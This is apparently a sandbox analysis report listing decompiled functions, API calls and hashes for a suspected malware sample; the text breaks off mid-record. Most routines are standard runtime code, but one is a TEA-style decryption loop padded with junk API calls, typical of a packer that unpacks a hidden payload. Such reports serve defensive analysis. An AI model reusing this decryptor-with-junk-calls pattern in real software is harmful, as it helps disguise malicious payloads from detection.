                    • Opcode ID: bad2ba65ab8759e2046cf4fad9a9f7db396e88697b27d25a0d3d6ac44797c18c
                    • Instruction ID: 32eeebdea68b919497aa8e2dc359b0f51f7b8260f3ccf762548db348a70ffc0b
                    • Opcode Fuzzy Hash: bad2ba65ab8759e2046cf4fad9a9f7db396e88697b27d25a0d3d6ac44797c18c
                    • Instruction Fuzzy Hash: 0D012D764021A8BBC711ABA0ED4CDDF7F6CEF0A351B004062F64AE2161C7385689CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00404C9B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                    				intOrPtr _v0;
                    				void* _v804;
                    				intOrPtr _v808;
                    				intOrPtr _v812;
                    				intOrPtr _t6;
                    				intOrPtr _t11;
                    				intOrPtr _t12;
                    				intOrPtr _t13;
                    				long _t17;
                    				intOrPtr _t21;
                    				intOrPtr _t22;
                    				intOrPtr _t25;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    				intOrPtr* _t31;
                    				void* _t34;
                    
                    				_t27 = __esi;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ecx;
                    				_t21 = __ebx;
                    				_t6 = __eax;
                    				_t34 = _t22 -  *0x41fadc; // 0xd4279346
                    				if(_t34 == 0) {
                    					asm("repe ret");
                    				}
                    				 *0x57a740 = _t6;
                    				 *0x57a73c = _t22;
                    				 *0x57a738 = _t25;
                    				 *0x57a734 = _t21;
                    				 *0x57a730 = _t27;
                    				 *0x57a72c = _t26;
                    				 *0x57a758 = ss;
                    				 *0x57a74c = cs;
                    				 *0x57a728 = ds;
                    				 *0x57a724 = es;
                    				 *0x57a720 = fs;
                    				 *0x57a71c = gs;
                    				asm("pushfd");
                    				_pop( *0x57a750);
                    				 *0x57a744 =  *_t31;
                    				 *0x57a748 = _v0;
                    				 *0x57a754 =  &_a4;
                    				 *0x57a690 = 0x10001;
                    				_t11 =  *0x57a748; // 0x0
                    				 *0x57a644 = _t11;
                    				 *0x57a638 = 0xc0000409;
                    				 *0x57a63c = 1;
                    				_t12 =  *0x41fadc; // 0xd4279346
                    				_v812 = _t12;
                    				_t13 =  *0x41fae0; // 0x2bd86cb9
                    				_v808 = _t13;
                    				 *0x57a688 = IsDebuggerPresent();
                    				_push(1);
                    				E00409156(_t14);
                    				SetUnhandledExceptionFilter(0);
                    				_t17 = UnhandledExceptionFilter(0x401aa4);
                    				if( *0x57a688 == 0) {
                    					_push(1);
                    					E00409156(_t17);
                    				}
                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                    			}



















                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404c9b
                    0x00404ca1
                    0x00404ca3
                    0x00404ca3
                    0x00407f83
                    0x00407f88
                    0x00407f8e
                    0x00407f94
                    0x00407f9a
                    0x00407fa0
                    0x00407fa6
                    0x00407fad
                    0x00407fb4
                    0x00407fbb
                    0x00407fc2
                    0x00407fc9
                    0x00407fd0
                    0x00407fd1
                    0x00407fda
                    0x00407fe2
                    0x00407fea
                    0x00407ff5
                    0x00407fff
                    0x00408004
                    0x00408009
                    0x00408013
                    0x0040801d
                    0x00408022
                    0x00408028
                    0x0040802d
                    0x00408039
                    0x0040803e
                    0x00408040
                    0x00408048
                    0x00408053
                    0x00408060
                    0x00408062
                    0x00408064
                    0x00408069
                    0x0040807d

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 00408033
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00408048
                    • UnhandledExceptionFilter.KERNEL32(00401AA4), ref: 00408053
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0040806F
                    • TerminateProcess.KERNEL32(00000000), ref: 00408076
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID:
                    • API String ID: 2579439406-0
                    • Opcode ID: 4fa1a9469513844494454f541b438840b5b47cfb6bec8d8128682c8d81ac2bda
                    • Instruction ID: 7f4b5c58c0784c1be33984ccd037a44821b10b4127e1c48174b1abfaa85dd263
                    • Opcode Fuzzy Hash: 4fa1a9469513844494454f541b438840b5b47cfb6bec8d8128682c8d81ac2bda
                    • Instruction Fuzzy Hash: 2721F3B49012049FDB18DF25F9896483BB0FBAC352F51502AE50D973B0E7B859C9BF4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004070BE() {
                    
                    				SetUnhandledExceptionFilter(E0040707C);
                    				return 0;
                    			}



                    0x004070c3
                    0x004070cb

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000707C), ref: 004070C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 981b28c00c1c86fde2a98e9046856445d5184983abc4c1fc3ad4d5e49b1e0d05
                    • Instruction ID: b02e7385f4e7ee37ca59c86dd11f3129a27d6b0d4d3066a9823a5c7f38c9b669
                    • Opcode Fuzzy Hash: 981b28c00c1c86fde2a98e9046856445d5184983abc4c1fc3ad4d5e49b1e0d05
                    • Instruction Fuzzy Hash: 2F900274A9910086D60417706D09A0A66945B4D7027514571E281E80A4DB745010D56A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.306092360.00000000008E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E8000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_8e8000_b8E3zd5AYc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: 0979f9f4d6bfd3c57323567b4642edd7aea78079381e66ee7dc945636950010c
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 011130727401449FDB54DE5ADCC1EA677EAFB8A320B298065ED04CB315E675E842CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E004030EB(unsigned int* _a4, signed int _a8) {
                    				unsigned int _v8;
                    				intOrPtr _v12;
                    				unsigned int _v16;
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				void* _v44;
                    				void* _v48;
                    				long _v52;
                    				char _v56;
                    				long _v60;
                    				long _v64;
                    				long _v68;
                    				long _v72;
                    				long _v76;
                    				char _v1100;
                    				char _v2124;
                    				char _v3148;
                    				void _v5196;
                    				unsigned int* _t61;
                    				intOrPtr* _t63;
                    				unsigned int* _t79;
                    				unsigned int _t102;
                    				unsigned int _t103;
                    				unsigned int _t104;
                    				signed int _t113;
                    				signed int _t114;
                    				signed int _t116;
                    				signed int _t117;
                    
                    				E00404450(0x1448);
                    				_t61 = _a4;
                    				_t104 =  *_t61;
                    				_v16 = _t61[1];
                    				_t63 = _a8;
                    				_v32 =  *_t63;
                    				_v36 =  *((intOrPtr*)(_t63 + 4));
                    				_v8 = _t104;
                    				_v12 = 0xc6ef3720;
                    				_v28 =  *((intOrPtr*)(_t63 + 8));
                    				_v40 =  *((intOrPtr*)(_t63 + 0xc));
                    				_v24 = 0x20;
                    				do {
                    					_t113 = _t104 << 4;
                    					if( *0x57a190 == 5) {
                    						FindCloseChangeNotification(0);
                    						_t104 = _v8;
                    					}
                    					_t114 = _t113 + _v28;
                    					_a8 = _v12 + _t104;
                    					_t102 = _t104 >> 5;
                    					if( *0x57a190 == 0x1b) {
                    						__imp__FindNextVolumeA(0,  &_v1100, 0);
                    						SetLocaleInfoA(0, 0, "Lopabuz");
                    						SetSystemTimeAdjustment(0, 0);
                    						InterlockedDecrement( &_v60);
                    						LocalFree(0);
                    					}
                    					 *0x574b10 = 0;
                    					_v20 = _t102 + _v40 ^ _a8 ^ _t114;
                    					 *0x574b10 =  *0x574b10 + _v20;
                    					E00403066( &_v16, _t102 + _v40 ^ _a8 ^ _t114);
                    					_t103 = _v16;
                    					_t116 = _t103 << 4;
                    					if( *0x57a190 == 0x78c) {
                    						GetComputerNameA( &_v1100,  &_v52);
                    						GetVolumeInformationA(0,  &_v2124, 0,  &_v76,  &_v64,  &_v68,  &_v3148, 0);
                    						ReadConsoleW(0,  &_v5196, 0,  &_v72, 0);
                    					}
                    					_t117 = _t116 + _v32;
                    					_a8 = _v16 + _v12;
                    					if( *0x57a190 == 0x1be) {
                    						ReadFile(0, 0, 0, 0, 0);
                    						__imp__GetConsoleAliasesW( &_v5196, 0, 0);
                    						_v48 = 0;
                    						_v44 = 0;
                    						__imp__InterlockedPushEntrySList( &_v48,  &_v56);
                    					}
                    					 *0x574b1c =  *0x574b1c | 0xffffffff;
                    					 *0x574b18 = 0xff6b3619;
                    					_v20 = _t117 ^ (_t103 >> 0x00000005) + _v36 ^ _a8;
                    					_v8 = _v8 - _v20;
                    					_v12 = _v12 + 0x61c88647;
                    					_t54 =  &_v24;
                    					 *_t54 = _v24 - 1;
                    					_t104 = _v8;
                    				} while ( *_t54 != 0);
                    				_t79 = _a4;
                    				_t79[1] = _t103;
                    				 *_t79 = _t104;
                    				return _t79;
                    			}



































                    0x004030f3
                    0x004030f8
                    0x004030fb
                    0x00403100
                    0x00403103
                    0x00403108
                    0x0040310f
                    0x0040311a
                    0x0040311d
                    0x00403124
                    0x00403127
                    0x0040312a
                    0x00403133
                    0x00403135
                    0x0040313f
                    0x00403142
                    0x00403148
                    0x00403148
                    0x0040314e
                    0x0040315d
                    0x00403160
                    0x00403162
                    0x0040316d
                    0x0040317a
                    0x00403182
                    0x0040318c
                    0x00403193
                    0x00403193
                    0x004031a2
                    0x004031aa
                    0x004031b0
                    0x004031bb
                    0x004031c0
                    0x004031c5
                    0x004031d2
                    0x004031df
                    0x00403202
                    0x00403216
                    0x00403216
                    0x0040321c
                    0x00403225
                    0x00403232
                    0x00403239
                    0x00403248
                    0x00403256
                    0x00403259
                    0x0040325c
                    0x0040325c
                    0x00403262
                    0x00403271
                    0x00403280
                    0x00403286
                    0x00403289
                    0x00403290
                    0x00403290
                    0x00403293
                    0x00403293
                    0x0040329c
                    0x004032a1
                    0x004032a4
                    0x004032a8

                    APIs
                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 00403142
                    • FindNextVolumeA.KERNEL32(00000000,?,00000000), ref: 0040316D
                    • SetLocaleInfoA.KERNEL32(00000000,00000000,Lopabuz), ref: 0040317A
                    • SetSystemTimeAdjustment.KERNEL32 ref: 00403182
                    • InterlockedDecrement.KERNEL32(?), ref: 0040318C
                    • LocalFree.KERNEL32(00000000), ref: 00403193
                    • GetComputerNameA.KERNEL32 ref: 004031DF
                    • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00403202
                    • ReadConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00403216
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403239
                    • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00403248
                    • InterlockedPushEntrySList.KERNEL32(?,?), ref: 0040325C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: ConsoleFindInterlockedReadVolume$AdjustmentAliasesChangeCloseComputerDecrementEntryFileFreeInfoInformationListLocalLocaleNameNextNotificationPushSystemTime
                    • String ID: $Lopabuz
                    • API String ID: 1472518974-2957910613
                    • Opcode ID: 8c902d01fe6e74f39a0ebfdbec1e0678bfa5b8c66a1aef81708450cfccae457b
                    • Instruction ID: 1b616bbc5b2a2b807360759a0e21ce9bcbbdf60082083dc51710300d4fdb8ff3
                    • Opcode Fuzzy Hash: 8c902d01fe6e74f39a0ebfdbec1e0678bfa5b8c66a1aef81708450cfccae457b
                    • Instruction Fuzzy Hash: B551FA75901218EFCB00CF98D9849DEBBB8FF48314F00816AE519E3260D7349A85DFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E004068FA(intOrPtr __ebx, void* __edi, void* __esi, void* __eflags) {
                    				struct HINSTANCE__* _t23;
                    				intOrPtr _t28;
                    				intOrPtr _t32;
                    				intOrPtr _t45;
                    				void* _t46;
                    
                    				_t35 = __ebx;
                    				_push(0xc);
                    				_push(0x40df10);
                    				E00406E94(__ebx, __edi, __esi);
                    				_t44 = L"KERNEL32.DLL";
                    				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                    				if(_t23 == 0) {
                    					_t23 = E004070CC(_t44);
                    				}
                    				 *(_t46 - 0x1c) = _t23;
                    				_t45 =  *((intOrPtr*)(_t46 + 8));
                    				 *((intOrPtr*)(_t45 + 0x5c)) = 0x401a28;
                    				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                    				if(_t23 != 0) {
                    					_t35 = __imp__GetProcAddress; // 0x76684ee0
                    					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                    					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                    				}
                    				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                    				 *((char*)(_t45 + 0xc8)) = 0x43;
                    				 *((char*)(_t45 + 0x14b)) = 0x43;
                    				 *(_t45 + 0x68) = 0x41fe20;
                    				E004081FA(_t35, 1, 0xd);
                    				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                    				InterlockedIncrement( *(_t45 + 0x68));
                    				 *(_t46 - 4) = 0xfffffffe;
                    				E004069CF();
                    				E004081FA(_t35, 1, 0xc);
                    				 *(_t46 - 4) = 1;
                    				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                    				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                    				if(_t28 == 0) {
                    					_t32 =  *0x41fe10; // 0x41fd38
                    					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                    				}
                    				E0040943B( *((intOrPtr*)(_t45 + 0x6c)));
                    				 *(_t46 - 4) = 0xfffffffe;
                    				return E00406ED9(E004069D8());
                    			}








                    0x004068fa
                    0x004068fa
                    0x004068fc
                    0x00406901
                    0x00406906
                    0x0040690c
                    0x00406914
                    0x00406917
                    0x0040691c
                    0x0040691d
                    0x00406920
                    0x00406923
                    0x0040692d
                    0x00406932
                    0x0040693a
                    0x00406942
                    0x00406952
                    0x00406952
                    0x00406958
                    0x0040695b
                    0x00406962
                    0x00406969
                    0x00406972
                    0x00406978
                    0x0040697f
                    0x00406985
                    0x0040698c
                    0x00406993
                    0x00406999
                    0x0040699c
                    0x0040699f
                    0x004069a4
                    0x004069a6
                    0x004069ab
                    0x004069ab
                    0x004069b1
                    0x004069b7
                    0x004069c8

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040DF10,0000000C,00406A35,00000000,00000000,?,?,004055B9,00404E89,00000001,?,00404222,00000001,?), ref: 0040690C
                    • __crt_waiting_on_module_handle.LIBCMT ref: 00406917
                      • Part of subcall function 004070CC: Sleep.KERNEL32(000003E8,?,?,0040685D,KERNEL32.DLL,?,00405AC2,?,00404E83,?,00000001,?,00404222,00000001,?), ref: 004070D8
                      • Part of subcall function 004070CC: GetModuleHandleW.KERNEL32(?,?,?,0040685D,KERNEL32.DLL,?,00405AC2,?,00404E83,?,00000001,?,00404222,00000001,?), ref: 004070E1
                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406940
                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00406950
                    • __lock.LIBCMT ref: 00406972
                    • InterlockedIncrement.KERNEL32(0041FE20), ref: 0040697F
                    • __lock.LIBCMT ref: 00406993
                    • ___addlocaleref.LIBCMT ref: 004069B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL$NhvPhv
                    • API String ID: 1028249917-688579292
                    • Opcode ID: f4697235d05f84fa90c4d611d0ac9856e53c7288727971d13edb9e8f8eec0a3c
                    • Instruction ID: 801cee06352f5f038e5c0e6b58d0008783acce4921ecf755d5d326563760f18f
                    • Opcode Fuzzy Hash: f4697235d05f84fa90c4d611d0ac9856e53c7288727971d13edb9e8f8eec0a3c
                    • Instruction Fuzzy Hash: 6E1163B1900701DAD7209F7AD90175ABBE0AF44318F10853FE49AB66E2CB7C9955CF5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00405E3A(intOrPtr __ecx) {
                    				void* _t47;
                    				intOrPtr _t48;
                    				void* _t53;
                    				void* _t54;
                    				void* _t56;
                    				intOrPtr _t57;
                    				void* _t58;
                    				void* _t61;
                    
                    				_push(0x2c);
                    				_push(0x40de70);
                    				E00406E94(_t47, _t54, _t56);
                    				_t48 = __ecx;
                    				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                    				_t57 =  *((intOrPtr*)(_t58 + 8));
                    				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                    				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                    				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                    				 *((intOrPtr*)(_t58 - 0x28)) = E00404828(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                    				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00406A5A(__ecx, _t53, _t61) + 0x88));
                    				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00406A5A(_t48, _t53, _t61) + 0x8c));
                    				 *((intOrPtr*)(E00406A5A(_t48, _t53, _t61) + 0x88)) = _t57;
                    				 *((intOrPtr*)(E00406A5A(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                    				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                    				 *(_t58 - 4) = 1;
                    				 *((intOrPtr*)(_t58 - 0x1c)) = E004048CD(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                    				 *(_t58 - 4) = 0xfffffffe;
                    				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                    				E00405F60(_t48, _t55, _t57);
                    				return E00406ED9( *((intOrPtr*)(_t58 - 0x1c)));
                    			}











                    0x00405e3a
                    0x00405e3c
                    0x00405e41
                    0x00405e46
                    0x00405e48
                    0x00405e4b
                    0x00405e4e
                    0x00405e51
                    0x00405e58
                    0x00405e69
                    0x00405e77
                    0x00405e85
                    0x00405e8d
                    0x00405e9b
                    0x00405ea1
                    0x00405ea8
                    0x00405eab
                    0x00405ec1
                    0x00405ec4
                    0x00405f39
                    0x00405f40
                    0x00405f47
                    0x00405f54

                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 00405E62
                      • Part of subcall function 00404828: __getptd.LIBCMT ref: 00404836
                      • Part of subcall function 00404828: __getptd.LIBCMT ref: 00404844
                    • __getptd.LIBCMT ref: 00405E6C
                      • Part of subcall function 00406A5A: __getptd_noexit.LIBCMT ref: 00406A5D
                      • Part of subcall function 00406A5A: __amsg_exit.LIBCMT ref: 00406A6A
                    • __getptd.LIBCMT ref: 00405E7A
                    • __getptd.LIBCMT ref: 00405E88
                    • __getptd.LIBCMT ref: 00405E93
                    • _CallCatchBlock2.LIBCMT ref: 00405EB9
                      • Part of subcall function 004048CD: __CallSettingFrame@12.LIBCMT ref: 00404919
                      • Part of subcall function 00405F60: __getptd.LIBCMT ref: 00405F6F
                      • Part of subcall function 00405F60: __getptd.LIBCMT ref: 00405F7D
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: 0816b11dbc3b11961b895392edaa66ac719ec553376946b1842d046d2c3400bc
                    • Instruction ID: a00ff4abe10f4448a2df6e401e12ef023c083e9201f2ef0526b270d896a2f970
                    • Opcode Fuzzy Hash: 0816b11dbc3b11961b895392edaa66ac719ec553376946b1842d046d2c3400bc
                    • Instruction Fuzzy Hash: E01126B1D00209DFDB00EFA1C445AAE7BB1FF08319F11857AF815B7291DB389A119F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E00404496(char _a4) {
                    				signed int _v16;
                    				char _v20;
                    				long _v24;
                    				signed int _v32;
                    				void* _v36;
                    				long _v40;
                    				void _v60;
                    				void* __edi;
                    				void* _t20;
                    				signed int _t21;
                    				signed int _t26;
                    				DWORD* _t27;
                    				void* _t30;
                    				signed int _t34;
                    				void* _t38;
                    
                    				while(1) {
                    					_t2 =  &_a4; // 0x4039e2
                    					_t20 = E00404DCA(_t30, _t38,  *_t2);
                    					if(_t20 != 0) {
                    						break;
                    					}
                    					_t21 = E00405AB2(_a4);
                    					__eflags = _t21;
                    					if(_t21 == 0) {
                    						__eflags =  *0x57a1a4 & 0x00000001;
                    						if(( *0x57a1a4 & 0x00000001) == 0) {
                    							 *0x57a1a4 =  *0x57a1a4 | 0x00000001;
                    							__eflags =  *0x57a1a4;
                    							E0040447B(0x57a198);
                    							E00405A8C( *0x57a1a4, 0x40baa2);
                    						}
                    						E00403A4B( &_v16, 0x57a198);
                    						_push(0x40dac0);
                    						_push( &_v16);
                    						L7();
                    						asm("int3");
                    						_push(0x57a198);
                    						_push(_t38);
                    						_t34 = 8;
                    						_v36 = memcpy( &_v60, 0x401394, _t34 << 2);
                    						_t26 = _v16;
                    						_v32 = _t26;
                    						__eflags = _t26;
                    						if(_t26 != 0) {
                    							__eflags =  *_t26 & 0x00000008;
                    							if(( *_t26 & 0x00000008) != 0) {
                    								_v20 = 0x1994000;
                    							}
                    						}
                    						_t27 =  &_v20;
                    						RaiseException(_v40, _v36, _v24, _t27);
                    						return _t27;
                    					} else {
                    						continue;
                    					}
                    					L11:
                    				}
                    				return _t20;
                    				goto L11;
                    			}


















                    0x004044ad
                    0x004044ad
                    0x004044b0
                    0x004044b8
                    0x00000000
                    0x00000000
                    0x004044a3
                    0x004044a9
                    0x004044ab
                    0x004044bc
                    0x004044c8
                    0x004044ca
                    0x004044ca
                    0x004044d3
                    0x004044dd
                    0x004044e2
                    0x004044e7
                    0x004044ec
                    0x004044f4
                    0x004044f5
                    0x004044fa
                    0x00404506
                    0x00404507
                    0x0040450a
                    0x00404515
                    0x00404518
                    0x0040451c
                    0x00404520
                    0x00404522
                    0x00404524
                    0x00404527
                    0x00404529
                    0x00404529
                    0x00404527
                    0x00404530
                    0x0040453d
                    0x00404544
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004044ab
                    0x004044bb
                    0x00000000

                    APIs
                    • _malloc.LIBCMT ref: 004044B0
                      • Part of subcall function 00404DCA: __FF_MSGBANNER.LIBCMT ref: 00404DED
                      • Part of subcall function 00404DCA: __NMSG_WRITE.LIBCMT ref: 00404DF4
                      • Part of subcall function 00404DCA: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000001,?,00404222,00000001,?,?,?,?,?,00402F4F,?), ref: 00404E41
                    • std::bad_alloc::bad_alloc.LIBCMT ref: 004044D3
                      • Part of subcall function 0040447B: std::exception::exception.LIBCMT ref: 00404487
                    • std::bad_exception::bad_exception.LIBCMT ref: 004044E7
                    • __CxxThrowException@8.LIBCMT ref: 004044F5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                    • String ID: 9@
                    • API String ID: 1411284514-2624149686
                    • Opcode ID: 3f8f8e7280837c27fcb78c74a1786ec937c5913403e5546fef38f7095140068c
                    • Instruction ID: 4b48c1a83ea22fe80c67c3ef89986cabe4756f8b7491aebdc77331ca37afcba3
                    • Opcode Fuzzy Hash: 3f8f8e7280837c27fcb78c74a1786ec937c5913403e5546fef38f7095140068c
